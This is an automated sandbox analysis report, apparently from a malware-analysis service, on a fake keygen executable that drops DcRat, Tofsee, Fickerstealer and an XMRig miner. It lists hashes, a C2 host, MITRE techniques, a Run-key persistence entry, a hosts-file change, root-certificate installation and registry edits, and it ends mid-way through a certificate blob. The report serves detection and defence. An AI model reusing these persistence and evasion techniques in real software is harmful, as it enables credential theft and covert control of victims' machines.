dcrat | b2718252be051e7fbc18b319b31ef746d88407272473a465b673cea0de3c4aad

Target

keygen-step-4 — копия.exe
Size

4.6MB
MD5

563107b1df2a00f4ec868acd9e08a205
SHA1

9cb9c91d66292f5317aa50d92e38834861e9c9b7
SHA256

bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
SHA512

99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Score

10^/10

dcrat fickerstealer tofsee xmrig discovery evasion infostealer miner persistence rat trojan

Malware Config

Extracted

Family

fickerstealer

sodaandcoke.top:80

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral7/memory/5152-290-0x00000001402CA898-mapping.dmp	xmrig
behavioral7/memory/5152-283-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

Processes:

Ultra.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 14 IoCs

Processes:

xiuhuali.exeJoSetp.exeInstall.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpUltraMediaBurner.exeBahykaejewi.exeDaezholypuda.exefilee.exeConhost.exe6DE2.tmp.exe7016.tmp.exe

pid	Process
1460	xiuhuali.exe
2684	JoSetp.exe
2632	Install.exe
3712	Install.tmp
3776	Ultra.exe
2060	ultramediaburner.exe
4148	ultramediaburner.tmp
4224	UltraMediaBurner.exe
4260	Bahykaejewi.exe
4320	Daezholypuda.exe
4440	filee.exe
4400	Conhost.exe
4304	6DE2.tmp.exe
4920	7016.tmp.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Bahykaejewi.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Bahykaejewi.exe

Loads dropped DLL 2 IoCs

Processes:

rundll32.exeInstall.tmp

pid	Process
2664	rundll32.exe
3712	Install.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exe

pid	Process
2544	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Ultra.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Taemanyheta.exe\""	Ultra.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
33	ip-api.com
97	api.ipify.org
199	api.myip.com
200	api.myip.com
263	api.2ip.ua
265	api.2ip.ua

Drops file in System32 directory 3 IoCs

Processes:

svchost.exe

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\IPR2NN0X.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\IPR2NN0X.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost.exe

description	pid	Process	procid_target
PID 3216 set thread context of 196	3216	svchost.exe	78

Drops file in Program Files directory 12 IoCs

Processes:

ultramediaburner.tmpUltra.exexiuhuali.exe

description	ioc	Process
File created	C:\Program Files (x86)\UltraMediaBurner\is-390E1.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Taemanyheta.exe.config	Ultra.exe
File created	C:\Program Files\install.dat	xiuhuali.exe
File created	C:\Program Files\install.dll	xiuhuali.exe
File created	C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe.config	Ultra.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-4ITOH.tmp	ultramediaburner.tmp
File created	C:\Program Files\libEGL.dll	xiuhuali.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Taemanyheta.exe	Ultra.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
behavioral7/files/0x000100000001ac83-324.dat	nsis_installer_2
behavioral7/files/0x000100000001ac83-323.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
3200	timeout.exe
684	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exe

pid	Process
2840	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
2308	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 16 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exerundll32.exeMicrosoftEdgeCP.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}\1 = "4164"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000001bd620527348f444750ddeed7c6a645a4b4fb6dcd7ac01c540708c2904921522c2e8ad0a78b039cc47f5c7ffbc33d7970293b7961d3240a8cc377010fbf4	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TV2553ZI-PZ3Y-VP7M-68Y0-MJT9X67Z6U7M}	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000973dc56bff01f8d9f110c05868d0b62c8fcd957a23229fc35c40c060a89115b0be999b5f848d6703298e192051f853145c7678f25ec8c61f366ead1d95a7c1b2937684980c96e3ca979481d5cdc8d1d1e387dbf95d9114cd1e91	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

filee.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	filee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110